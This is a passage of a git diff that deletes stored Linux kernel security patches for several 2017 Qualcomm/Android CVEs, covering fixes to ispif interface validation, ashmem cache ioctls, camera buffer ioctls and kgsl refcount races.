-+ uint8_t intftype, enum msm_ispif_vfe_intf vfe_intf)
- {
- int rc = 0;
- uint32_t data = 0;
-@@ -501,7 +501,7 @@ static int msm_ispif_validate_intf_status(struct ispif_device *ispif,
- }
-
- static void msm_ispif_select_clk_mux(struct ispif_device *ispif,
-- uint8_t intftype, uint8_t csid, uint8_t vfe_intf)
-+ uint8_t intftype, uint8_t csid, enum msm_ispif_vfe_intf vfe_intf)
- {
- uint32_t data = 0;
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8260/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2017-8260/3.18/0002.patch
deleted file mode 100644
index 33705f5a..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8260/3.18/0002.patch
+++ /dev/null
@@ -1,32 +0,0 @@
-From 8f236391e5187c05f7f4b937856944be0af7aaa5 Mon Sep 17 00:00:00 2001
-From: Junzhe Zou
-Date: Wed, 15 Mar 2017 15:06:04 -0700
-Subject: msm: ispif: fix a bug in checking the validity of vfe intf
-
-Parse the whole length of vfe intf to the validate function to avoid
-the situation that the lower 8bits pass the validation while intf is
-crafted to a large value which can cause buffer overflow later.
-
-CRs-Fixed: 2008469
-Change-Id: I0de19ec36d73918ab2f38eb7ba1f833c02a3face
-Signed-off-by: Junzhe Zou
----
- drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c b/drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c
-index 03aa65d..ccc983f 100644
---- a/drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c
-+++ b/drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c
-@@ -87,7 +87,7 @@ static void msm_ispif_io_dump_reg(struct ispif_device *ispif)
-
-
- static inline int msm_ispif_is_intf_valid(uint32_t csid_version,
-- uint8_t intf_type)
-+ enum msm_ispif_vfe_intf intf_type)
- {
- return ((csid_version <= CSID_VERSION_V22 && intf_type != VFE0) ||
- (intf_type >= VFE_MAX)) ? false : true;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8260/4.4/0003.patch b/Patches/Linux_CVEs/CVE-2017-8260/4.4/0003.patch
deleted file mode 100644
index f6dfaab4..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8260/4.4/0003.patch
+++ /dev/null
@@ -1,32 +0,0 @@
-From 7b7534d96813ffe502271b0b3fae0d0d12e3e05b Mon Sep 17 00:00:00 2001
-From: Junzhe Zou
-Date: Wed, 15 Mar 2017 15:06:04 -0700
-Subject: msm: ispif: fix a bug in checking the validity of vfe intf
-
-Parse the whole length of vfe intf to the validate function to avoid
-the situation that the lower 8bits pass the validation while intf is
-crafted to a large value which can cause buffer overflow later.
-
-CRs-Fixed: 2008469
-Change-Id: I0de19ec36d73918ab2f38eb7ba1f833c02a3face
-Signed-off-by: Junzhe Zou
----
- drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c b/drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c
-index 1628c098..cb7b2a1 100644
---- a/drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c
-+++ b/drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c
-@@ -73,7 +73,7 @@ static void msm_ispif_io_dump_reg(struct ispif_device *ispif)
-
-
- static inline int msm_ispif_is_intf_valid(uint32_t csid_version,
-- uint8_t intf_type)
-+ enum msm_ispif_vfe_intf intf_type)
- {
- return ((csid_version <= CSID_VERSION_V22 && intf_type != VFE0) ||
- (intf_type >= VFE_MAX)) ? false : true;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8261/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-8261/3.10/0001.patch
deleted file mode 100644
index 61f054bd..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8261/3.10/0001.patch
+++ /dev/null
@@ -1,99 +0,0 @@
-From 2a2f0b7463f4de9ca225769204ff62c71760709c Mon Sep 17 00:00:00 2001
-From: Sudarshan Rajagopalan
-Date: Thu, 6 Apr 2017 16:15:48 -0700
-Subject: ashmem: remove cache maintenance support
-
-The cache maintenance routines in ashmem were causing
-several security issues. Since they are not being used
-anymore by any drivers, its well to remove them entirely.
-
-CRs-Fixed: 1107034, 2001129, 2007786
-Change-Id: I955e33d90b888d58db5cf6bb490905283374425b
-Signed-off-by: Sudarshan Rajagopalan
----
- drivers/staging/android/ashmem.c | 41 ----------------------------------------
- include/uapi/linux/ashmem.h | 3 ---
- 2 files changed, 44 deletions(-)
-
-diff --git a/drivers/staging/android/ashmem.c b/drivers/staging/android/ashmem.c
-index ee79ac8..f13aab2 100644
---- a/drivers/staging/android/ashmem.c
-+++ b/drivers/staging/android/ashmem.c
-@@ -32,7 +32,6 @@
- #include
- #include
- #include
--#include
-
- #include "ashmem.h"
-
-@@ -659,37 +658,6 @@ static int ashmem_pin_unpin(struct ashmem_area *asma, unsigned long cmd,
- return ret;
- }
-
--static int ashmem_cache_op(struct ashmem_area *asma,
-- void (*cache_func)(const void *vstart, const void *vend))
--{
-- int ret = 0;
-- struct vm_area_struct *vma;
-- if (!asma->vm_start)
-- return -EINVAL;
--
-- down_read(¤t->mm->mmap_sem);
-- vma = find_vma(current->mm, asma->vm_start);
-- if (!vma) {
-- ret = -EINVAL;
-- goto done;
-- }
-- if (vma->vm_file != asma->file) {
-- ret = -EINVAL;
-- goto done;
-- }
-- if ((asma->vm_start + asma->size) > vma->vm_end) {
-- ret = -EINVAL;
-- goto done;
-- }
-- cache_func((void *)asma->vm_start,
-- (void *)(asma->vm_start + asma->size));
--done:
-- up_read(¤t->mm->mmap_sem);
-- if (ret)
-- asma->vm_start = 0;
-- return ret;
--}
--
- static long ashmem_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
- {
- struct ashmem_area *asma = file->private_data;
-@@ -735,15 +703,6 @@ static long ashmem_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
-
ashmem_shrink(&ashmem_shrinker, &sc);
- }
- break;
-- case ASHMEM_CACHE_FLUSH_RANGE:
-- ret = ashmem_cache_op(asma, &dmac_flush_range);
-- break;
-- case ASHMEM_CACHE_CLEAN_RANGE:
-- ret = ashmem_cache_op(asma, &dmac_clean_range);
-- break;
-- case ASHMEM_CACHE_INV_RANGE:
-- ret = ashmem_cache_op(asma, &dmac_inv_range);
-- break;
- }
-
- return ret;
-diff --git a/include/uapi/linux/ashmem.h b/include/uapi/linux/ashmem.h
-index 7ec977f..7797439 100644
---- a/include/uapi/linux/ashmem.h
-+++ b/include/uapi/linux/ashmem.h
-@@ -34,8 +34,5 @@ struct ashmem_pin {
- #define ASHMEM_UNPIN _IOW(__ASHMEMIOC, 8, struct ashmem_pin)
- #define ASHMEM_GET_PIN_STATUS _IO(__ASHMEMIOC, 9)
- #define ASHMEM_PURGE_ALL_CACHES _IO(__ASHMEMIOC, 10)
--#define ASHMEM_CACHE_FLUSH_RANGE _IO(__ASHMEMIOC, 11)
--#define ASHMEM_CACHE_CLEAN_RANGE _IO(__ASHMEMIOC, 12)
--#define ASHMEM_CACHE_INV_RANGE _IO(__ASHMEMIOC, 13)
-
- #endif /* _UAPI_LINUX_ASHMEM_H */
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8261/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2017-8261/3.18/0002.patch
deleted file mode 100644
index 8480a4d8..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8261/3.18/0002.patch
+++ /dev/null
@@ -1,33 +0,0 @@
-From 8576feebaf688dadf0548b9a16d2b90b76ed714c Mon Sep 17 00:00:00 2001
-From: Trishansh Bhardwaj
-Date: Tue, 18 Apr 2017 14:44:43 +0530
-Subject: msm: camera: Fix kernel overwrite GET_BUF_BY_IDX ioctl
-
-Assign address of buf_info into ioctl_ptr.
-Previously we were copying first 8 bytes of buf_info (content)
-into ioctl_ptr. Which is dereferenced and written later causing
-kernel overwrite vulnerability.
-
-Change-Id: Ie5deae249da8208523027f8ec5632f960757e9bd
-Signed-off-by: Trishansh Bhardwaj
----
- drivers/media/platform/msm/camera_v2/msm_buf_mgr/msm_generic_buf_mgr.c | 3 +--
- 1 file changed, 1 insertion(+), 2 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/msm_buf_mgr/msm_generic_buf_mgr.c b/drivers/media/platform/msm/camera_v2/msm_buf_mgr/msm_generic_buf_mgr.c
-index 882ab03..d0b265a 100644
---- a/drivers/media/platform/msm/camera_v2/msm_buf_mgr/msm_generic_buf_mgr.c
-+++ b/drivers/media/platform/msm/camera_v2/msm_buf_mgr/msm_generic_buf_mgr.c
-@@ -554,8 +554,7 @@ static long msm_buf_mngr_subdev_ioctl(struct v4l2_subdev *sd,
- sizeof(struct msm_buf_mngr_info))) {
- return -EFAULT;
- }
-- MSM_CAM_GET_IOCTL_ARG_PTR(&k_ioctl.ioctl_ptr,
-- &buf_info, sizeof(void *));
-+ k_ioctl.ioctl_ptr = (uintptr_t)&buf_info;
- argp = &k_ioctl;
- rc = msm_cam_buf_mgr_ops(cmd, argp);
- }
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8262/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-8262/3.10/0001.patch
deleted file mode 100644
index 62263ec7..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8262/3.10/0001.patch
+++ /dev/null
@@ -1,53 +0,0 @@
-diff --git a/drivers/gpu/msm/kgsl.c b/drivers/gpu/msm/kgsl.c
-index 640e6c1..57e3ea3 100644
---- a/drivers/gpu/msm/kgsl.c
-+++ b/drivers/gpu/msm/kgsl.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2008-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2008-2017, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -167,8 +167,11 @@
- {
- struct kgsl_mem_entry *entry = kzalloc(sizeof(*entry), GFP_KERNEL);
-
-- if (entry)
-+ if (entry) {
- kref_init(&entry->refcount);
-+ /* put this ref in the caller functions after init */
-+ kref_get(&entry->refcount);
-+ }
-
- return entry;
- }
-@@ -3019,6 +3022,9 @@
- trace_kgsl_mem_map(entry, param->fd);
-
- kgsl_mem_entry_commit_process(private, entry);
-+
-+ /* put the extra refcount for kgsl_mem_entry_create() */
-+ kgsl_mem_entry_put(entry);
- return result;
-
- error_attach:
-@@ -3343,6 +3349,9 @@
- param->flags = entry->memdesc.flags;
-
- kgsl_mem_entry_commit_process(private, entry);
-+
-+ /* put the extra refcount for kgsl_mem_entry_create() */
-+ kgsl_mem_entry_put(entry);
- return result;
- err:
- kgsl_sharedmem_free(&entry->memdesc);
-@@ -3382,6 +3391,9 @@
- param->gpuaddr = entry->memdesc.gpuaddr;
-
- kgsl_mem_entry_commit_process(private, entry);
-+
-+ /* put the extra refcount for kgsl_mem_entry_create() */
-+ kgsl_mem_entry_put(entry);
- return result;
- err:
- if (entry)
diff --git a/Patches/Linux_CVEs/CVE-2017-8262/3.10/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2017-8262/3.10/0001.patch.base64
deleted file mode 100644
index 126f126e..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8262/3.10/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@ -ZGlmZiAtLWdpdCBhL2RyaXZlcnMvZ3B1L21zbS9rZ3NsLmMgYi9kcml2ZXJzL2dwdS9tc20va2dzbC5jCmluZGV4IDY0MGU2YzEuLjU3ZTNlYTMgMTAwNjQ0Ci0tLSBhL2RyaXZlcnMvZ3B1L21zbS9rZ3NsLmMKKysrIGIvZHJpdmVycy9ncHUvbXNtL2tnc2wuYwpAQCAtMSw0ICsxLDQgQEAKLS8qIENvcHlyaWdodCAoYykgMjAwOC0yMDE2LCBUaGUgTGludXggRm91bmRhdGlvbi4gQWxsIHJpZ2h0cyByZXNlcnZlZC4KKy8qIENvcHlyaWdodCAoYykgMjAwOC0yMDE3LCBUaGUgTGludXggRm91bmRhdGlvbi4gQWxsIHJpZ2h0cyByZXNlcnZlZC4KICAqCiAgKiBUaGlzIHByb2dyYW0gaXMgZnJlZSBzb2Z0d2FyZTsgeW91IGNhbiByZWRpc3RyaWJ1dGUgaXQgYW5kL29yIG1vZGlmeQogICogaXQgdW5kZXIgdGhlIHRlcm1zIG9mIHRoZSBHTlUgR2VuZXJhbCBQdWJsaWMgTGljZW5zZSB2ZXJzaW9uIDIgYW5kCkBAIC0xNjcsOCArMTY3LDExIEBACiB7CiAJc3RydWN0IGtnc2xfbWVtX2VudHJ5ICplbnRyeSA9IGt6YWxsb2Moc2l6ZW9mKCplbnRyeSksIEdGUF9LRVJORUwpOwogCi0JaWYgKGVudHJ5KQorCWlmIChlbnRyeSkgewogCQlrcmVmX2luaXQoJmVudHJ5LT5yZWZjb3VudCk7CisJCS8qIHB1dCB0aGlzIHJlZiBpbiB0aGUgY2FsbGVyIGZ1bmN0aW9ucyBhZnRlciBpbml0ICovCisJCWtyZWZfZ2V0KCZlbnRyeS0+cmVmY291bnQpOworCX0KIAogCXJldHVybiBlbnRyeTsKIH0KQEAgLTMwMTksNiArMzAyMiw5IEBACiAJdHJhY2Vfa2dzbF9tZW1fbWFwKGVudHJ5LCBwYXJhbS0+ZmQpOwogCiAJa2dzbF9tZW1fZW50cnlfY29tbWl0X3Byb2Nlc3MocHJpdmF0ZSwgZW50cnkpOworCisJLyogcHV0IHRoZSBleHRyYSByZWZjb3VudCBmb3Iga2dzbF9tZW1fZW50cnlfY3JlYXRlKCkgKi8KKwlrZ3NsX21lbV9lbnRyeV9wdXQoZW50cnkpOwogCXJldHVybiByZXN1bHQ7CiAKIGVycm9yX2F0dGFjaDoKQEAgLTMzNDMsNiArMzM0OSw5IEBACiAJcGFyYW0tPmZsYWdzID0gZW50cnktPm1lbWRlc2MuZmxhZ3M7CiAKIAlrZ3NsX21lbV9lbnRyeV9jb21taXRfcHJvY2Vzcyhwcml2YXRlLCBlbnRyeSk7CisKKwkvKiBwdXQgdGhlIGV4dHJhIHJlZmNvdW50IGZvciBrZ3NsX21lbV9lbnRyeV9jcmVhdGUoKSAqLworCWtnc2xfbWVtX2VudHJ5X3B1dChlbnRyeSk7CiAJcmV0dXJuIHJlc3VsdDsKIGVycjoKIAlrZ3NsX3NoYXJlZG1lbV9mcmVlKCZlbnRyeS0+bWVtZGVzYyk7CkBAIC0zMzgyLDYgKzMzOTEsOSBAQAogCXBhcmFtLT5ncHVhZGRyID0gZW50cnktPm1lbWRlc2MuZ3B1YWRkcjsKIAogCWtnc2xfbWVtX2VudHJ5X2NvbW1pdF9wcm9jZXNzKHByaXZhdGUsIGVudHJ5KTsKKworCS8qIHB1dCB0aGUgZXh0cmEgcmVmY291bnQgZm9yIGtnc2xfbWVtX2VudHJ5X2NyZWF0ZSgpICovCisJa2dzbF9tZW1fZW50cnlfcHV0KGVudHJ5KTsKIAlyZXR1cm4gcmVzdWx0OwogZXJyOgogCWlmIChlbnRyeSkK \ No newline at end of 
file
diff --git a/Patches/Linux_CVEs/CVE-2017-8262/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2017-8262/3.18/0002.patch
deleted file mode 100644
index f0df1059..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8262/3.18/0002.patch
+++ /dev/null
@@ -1,83 +0,0 @@
-From 20c8f1c393ec2726ac46642ae8883643f2427c4f Mon Sep 17 00:00:00 2001
-From: Sunil Khatri
-Date: Thu, 6 Apr 2017 16:56:47 +0530
-Subject: msm: kgsl: Fix kgsl memory allocation and free race condition
-
-When allocating userspace memory keep reference to memory
-allocation till it is completely initialized and info is sent back
-to userspace.
-
-Change-Id: Id72c82bf98c094ecbd4722813c732a998dcbb188
-Signed-off-by: Tarun Karra
-Signed-off-by: Sunil Khatri
----
- drivers/gpu/msm/kgsl.c | 17 ++++++++++++++++-
- 1 file changed, 16 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/gpu/msm/kgsl.c b/drivers/gpu/msm/kgsl.c
-index 0ba75e0..8f6ff24 100644
---- a/drivers/gpu/msm/kgsl.c
-+++ b/drivers/gpu/msm/kgsl.c
-@@ -250,8 +250,11 @@ kgsl_mem_entry_create(void)
- {
- struct kgsl_mem_entry *entry = kzalloc(sizeof(*entry), GFP_KERNEL);
-
-- if (entry != NULL)
-+ if (entry != NULL) {
- kref_init(&entry->refcount);
-+ /* put this ref in the caller functions after init */
-+ kref_get(&entry->refcount);
-+ }
-
- return entry;
- }
-@@ -2300,6 +2303,9 @@ long kgsl_ioctl_gpuobj_import(struct kgsl_device_private *dev_priv,
- trace_kgsl_mem_map(entry, fd);
-
- kgsl_mem_entry_commit_process(entry);
-+
-+ /* put the extra refcount for kgsl_mem_entry_create() */
-+ kgsl_mem_entry_put(entry);
- return 0;
-
- unmap:
-@@ -2606,6 +2612,9 @@ long kgsl_ioctl_map_user_mem(struct kgsl_device_private *dev_priv,
- trace_kgsl_mem_map(entry, param->fd);
-
- kgsl_mem_entry_commit_process(entry);
-+
-+ /* put the extra refcount for kgsl_mem_entry_create() */
-+ kgsl_mem_entry_put(entry);
- return result;
-
- error_attach:
-@@ -3044,6 +3053,8 @@ long kgsl_ioctl_gpuobj_alloc(struct kgsl_device_private *dev_priv,
- param->mmapsize = kgsl_memdesc_footprint(&entry->memdesc);
- param->id = entry->id;
-
-+ /* put the extra refcount for kgsl_mem_entry_create() */
-+ kgsl_mem_entry_put(entry);
- return 0;
- }
-
-@@ -3067,6 +3078,8 @@ long kgsl_ioctl_gpumem_alloc(struct kgsl_device_private *dev_priv,
- param->size = (size_t) entry->memdesc.size;
- param->flags = (unsigned int) entry->memdesc.flags;
-
-+ /* put the extra refcount for kgsl_mem_entry_create() */
-+ kgsl_mem_entry_put(entry);
- return 0;
- }
-
-@@ -3090,6 +3103,8 @@ long kgsl_ioctl_gpumem_alloc_id(struct kgsl_device_private *dev_priv,
- param->mmapsize = (size_t) kgsl_memdesc_footprint(&entry->memdesc);
- param->gpuaddr = (unsigned long) entry->memdesc.gpuaddr;
-
-+ /* put the extra refcount for kgsl_mem_entry_create() */
-+ kgsl_mem_entry_put(entry);
- return 0;
- }
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8262/4.4/0003.patch b/Patches/Linux_CVEs/CVE-2017-8262/4.4/0003.patch
deleted file mode 100644
index 580dc9b9..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8262/4.4/0003.patch
+++ /dev/null
@@ -1,107 +0,0 @@
-From 9ef4ee8e3dfaf4e796bda781826851deebbd89bd Mon Sep 17 00:00:00 2001
-From: Sunil Khatri
-Date: Fri, 7 Apr 2017 17:00:55 +0530
-Subject: msm: kgsl: Fix kgsl memory allocation and free race condition
-
-When allocating userspace memory keep reference to memory
-allocation till it is completely initialized and info is sent back
-to userspace.
-
-Change-Id: Id72c82bf98c094ecbd4722813c732a998dcbb188
-Signed-off-by: Tarun Karra
-Signed-off-by: Sunil Khatri
----
- drivers/gpu/msm/kgsl.c | 26 +++++++++++++++++++++++++-
- 1 file changed, 25 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/gpu/msm/kgsl.c b/drivers/gpu/msm/kgsl.c
-index 1de8e21..e49b39f 100644
---- a/drivers/gpu/msm/kgsl.c
-+++ b/drivers/gpu/msm/kgsl.c
-@@ -260,9 +260,12 @@ kgsl_mem_entry_create(void)
- {
- struct kgsl_mem_entry *entry = kzalloc(sizeof(*entry), GFP_KERNEL);
-
-- if (entry != NULL)
-+ if (entry != NULL) {
- kref_init(&entry->refcount);
-
-+ /* put this ref in the caller functions after init */
-+ kref_get(&entry->refcount);
-+ }
- return entry;
- }
- #ifdef CONFIG_DMA_SHARED_BUFFER
-@@ -2399,6 +2402,9 @@ long kgsl_ioctl_gpuobj_import(struct kgsl_device_private *dev_priv,
- trace_kgsl_mem_map(entry, fd);
-
- kgsl_mem_entry_commit_process(entry);
-+
-+ /* put the extra refcount for kgsl_mem_entry_create() */
-+ kgsl_mem_entry_put(entry);
- return 0;
-
- unmap:
-@@ -2705,6 +2711,9 @@ long kgsl_ioctl_map_user_mem(struct kgsl_device_private *dev_priv,
- trace_kgsl_mem_map(entry, param->fd);
-
- kgsl_mem_entry_commit_process(entry);
-+
-+ /* put the extra refcount for kgsl_mem_entry_create() */
-+ kgsl_mem_entry_put(entry);
- return result;
-
- error_attach:
-@@ -3143,6 +3152,9 @@ long kgsl_ioctl_gpuobj_alloc(struct kgsl_device_private *dev_priv,
- param->mmapsize = kgsl_memdesc_footprint(&entry->memdesc);
- param->id = entry->id;
-
-+ /* put the extra refcount for kgsl_mem_entry_create() */
-+ kgsl_mem_entry_put(entry);
-+
- return 0;
- }
-
-@@ -3166,6 +3178,9 @@ long kgsl_ioctl_gpumem_alloc(struct kgsl_device_private *dev_priv,
- param->size = (size_t) entry->memdesc.size;
- param->flags = (unsigned int) entry->memdesc.flags;
-
-+ /* put the extra refcount for kgsl_mem_entry_create() */
-+ kgsl_mem_entry_put(entry);
-+
- return 0;
- }
-
-@@ -3189,6 +3204,9 @@ long kgsl_ioctl_gpumem_alloc_id(struct kgsl_device_private *dev_priv,
- param->mmapsize = (size_t) kgsl_memdesc_footprint(&entry->memdesc);
- param->gpuaddr = (unsigned long) entry->memdesc.gpuaddr;
-
-+ /* put the extra refcount for kgsl_mem_entry_create() */
-+ kgsl_mem_entry_put(entry);
-+
- return 0;
- }
-
-@@ -3306,6 +3324,9 @@ long kgsl_ioctl_sparse_phys_alloc(struct kgsl_device_private *dev_priv,
- trace_sparse_phys_alloc(entry->id, param->size, param->pagesize);
- kgsl_mem_entry_commit_process(entry);
-
-+ /* put the extra refcount for kgsl_mem_entry_create() */
-+ kgsl_mem_entry_put(entry);
-+
- return 0;
-
- err_invalid_pages:
-@@ -3385,6 +3406,9 @@ long kgsl_ioctl_sparse_virt_alloc(struct kgsl_device_private *dev_priv,
- trace_sparse_virt_alloc(entry->id, param->size, param->pagesize);
- kgsl_mem_entry_commit_process(entry);
-
-+ /* put the extra refcount for kgsl_mem_entry_create() */
-+ kgsl_mem_entry_put(entry);
-+
- return 0;
- }
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8263/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-8263/ANY/0001.patch
deleted file mode 100644
index 61f054bd..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8263/ANY/0001.patch
+++ /dev/null
@@ -1,99 +0,0 @@
-From 2a2f0b7463f4de9ca225769204ff62c71760709c Mon Sep 17 00:00:00 2001
-From: Sudarshan Rajagopalan
-Date: Thu, 6 Apr 2017 16:15:48 -0700
-Subject: ashmem: remove cache maintenance support
-
-The cache maintenance routines in ashmem were causing
-several security issues. Since they are not being used
-anymore by any drivers, its well to remove them entirely.
-
-CRs-Fixed: 1107034, 2001129, 2007786
-Change-Id: I955e33d90b888d58db5cf6bb490905283374425b
-Signed-off-by: Sudarshan Rajagopalan
----
- drivers/staging/android/ashmem.c | 41 ----------------------------------------
- include/uapi/linux/ashmem.h | 3 ---
- 2 files changed, 44 deletions(-)
-
-diff --git a/drivers/staging/android/ashmem.c b/drivers/staging/android/ashmem.c
-index ee79ac8..f13aab2 100644
---- a/drivers/staging/android/ashmem.c
-+++ b/drivers/staging/android/ashmem.c
-@@ -32,7 +32,6 @@
- #include
- #include
- #include
--#include
-
- #include "ashmem.h"
-
-@@ -659,37 +658,6 @@ static int ashmem_pin_unpin(struct ashmem_area *asma, unsigned long cmd,
- return ret;
- }
-
--static int ashmem_cache_op(struct ashmem_area *asma,
-- void (*cache_func)(const void *vstart, const void *vend))
--{
-- int ret = 0;
-- struct vm_area_struct *vma;
-- if (!asma->vm_start)
-- return -EINVAL;
--
-- down_read(¤t->mm->mmap_sem);
-- vma = find_vma(current->mm, asma->vm_start);
-- if (!vma) {
-- ret = -EINVAL;
-- goto done;
-- }
-- if (vma->vm_file != asma->file) {
-- ret = -EINVAL;
-- goto done;
-- }
-- if ((asma->vm_start + asma->size) > vma->vm_end) {
-- ret = -EINVAL;
-- goto done;
-- }
-- cache_func((void *)asma->vm_start,
-- (void *)(asma->vm_start + asma->size));
--done:
-- up_read(¤t->mm->mmap_sem);
-- if (ret)
-- asma->vm_start = 0;
-- return ret;
--}
--
- static long ashmem_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
- {
- struct ashmem_area *asma = file->private_data;
-@@ -735,15 +703,6 @@ static long ashmem_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
- ashmem_shrink(&ashmem_shrinker, &sc);
- }
- break;
-- case ASHMEM_CACHE_FLUSH_RANGE:
-- ret = ashmem_cache_op(asma, &dmac_flush_range);
-- break;
-- case ASHMEM_CACHE_CLEAN_RANGE:
-- ret = ashmem_cache_op(asma, &dmac_clean_range);
-- break;
-- case ASHMEM_CACHE_INV_RANGE:
-- ret = ashmem_cache_op(asma, &dmac_inv_range);
-- break;
- }
-
- return ret;
-diff --git a/include/uapi/linux/ashmem.h b/include/uapi/linux/ashmem.h
-index 7ec977f..7797439 100644
---- a/include/uapi/linux/ashmem.h
-+++ b/include/uapi/linux/ashmem.h
-@@ -34,8 +34,5 @@ struct ashmem_pin {
- #define ASHMEM_UNPIN _IOW(__ASHMEMIOC, 8, struct ashmem_pin)
- #define ASHMEM_GET_PIN_STATUS _IO(__ASHMEMIOC, 9)
- #define ASHMEM_PURGE_ALL_CACHES _IO(__ASHMEMIOC, 10)
--#define ASHMEM_CACHE_FLUSH_RANGE _IO(__ASHMEMIOC, 11)
--#define ASHMEM_CACHE_CLEAN_RANGE _IO(__ASHMEMIOC, 12)
--#define ASHMEM_CACHE_INV_RANGE _IO(__ASHMEMIOC, 13)
-
- #endif /* _UAPI_LINUX_ASHMEM_H */
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8264/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-8264/3.10/0001.patch
deleted file mode 100644
index f5bb668f..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8264/3.10/0001.patch
+++ /dev/null
@@ -1,235 +0,0 @@
-From 4268b75208ca04bc63dcfadbb9a1eca8e964a697 Mon Sep 17 00:00:00 2001
-From: Nick Desaulniers
-Date: Wed, 10 May 2017 11:39:45 -0700
-Subject: BACKPORT: msm: camera: Add regulator enable and disable independent
- of CSID
-
-Regulator enable and disable of CSIPHY depends on the CSID module.
-Make the enable and disable of clk regulator independent of CSIPHY.
-
-Bug: 33299365
-CRs-Fixed: 1107702
-Change-Id: Iabb5eb28d63b34a4c3201c53be17054a1907f4fe
-Signed-off-by: Ravi Kishore Tanuku
-Signed-off-by: VijayaKumar T M
-Signed-off-by: Dennis Cagle
-(cherry picked from commit b1bb44c9cca61e48ec6158abad6e7969a8e58abf)
----
- arch/arm/boot/dts/qcom/apq8084-camera.dtsi | 6 ++
- .../msm/camera_v2/sensor/csiphy/msm_csiphy.c | 95 +++++++++++++++++++++-
- .../msm/camera_v2/sensor/csiphy/msm_csiphy.h | 2 +
- 3 files changed, 102 insertions(+), 1 deletion(-)
-
-diff --git a/arch/arm/boot/dts/qcom/apq8084-camera.dtsi b/arch/arm/boot/dts/qcom/apq8084-camera.dtsi
-index 2d7e126..abc85bf9 100644
---- a/arch/arm/boot/dts/qcom/apq8084-camera.dtsi
-+++ b/arch/arm/boot/dts/qcom/apq8084-camera.dtsi
-@@ -26,6 +26,8 @@
- reg-names = "csiphy", "csiphy_clk_mux";
- interrupts = <0 78 0>;
- interrupt-names = "csiphy";
-+ qcom,csi-vdd-voltage = <1800000>;
-+ qcom,mipi-csi-vdd-supply = <&pma8084_l12>;
- };
-
- qcom,csiphy@fda0b000 {
-@@ -36,6 +38,8 @@
- reg-names = "csiphy", "csiphy_clk_mux";
- interrupts = <0 79 0>;
- interrupt-names = "csiphy";
-+ qcom,csi-vdd-voltage = <1800000>;
-+ qcom,mipi-csi-vdd-supply = <&pma8084_l12>;
- };
-
- qcom,csiphy@fda0b400 {
-@@ -46,6 +50,8 @@
- reg-names = "csiphy", "csiphy_clk_mux";
- interrupts = <0 80 0>;
- interrupt-names = "csiphy";
-+ qcom,csi-vdd-voltage = <1800000>;
-+ qcom,mipi-csi-vdd-supply = <&pma8084_l12>;
- };
-
- qcom,csid@fda08000 {
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/csiphy/msm_csiphy.c b/drivers/media/platform/msm/camera_v2/sensor/csiphy/msm_csiphy.c
-index 8aac9b6..5301b33 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/csiphy/msm_csiphy.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/csiphy/msm_csiphy.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2011-2014, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2011-2014, 2017 The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -28,6 +28,10 @@
- #define CSIPHY_VERSION_V30 0x10
- #define MSM_CSIPHY_DRV_NAME "msm_csiphy"
-
-+static struct camera_vreg_t csiphy_vreg_info[] = {
-+ {"qcom,mipi-csi-vdd", 0, 0, 12000},
-+};
-+
- #undef CDBG
- #ifdef CONFIG_MSMB_CAMERA_DEBUG
- #define CDBG(fmt, args...) pr_err(fmt, ##args)
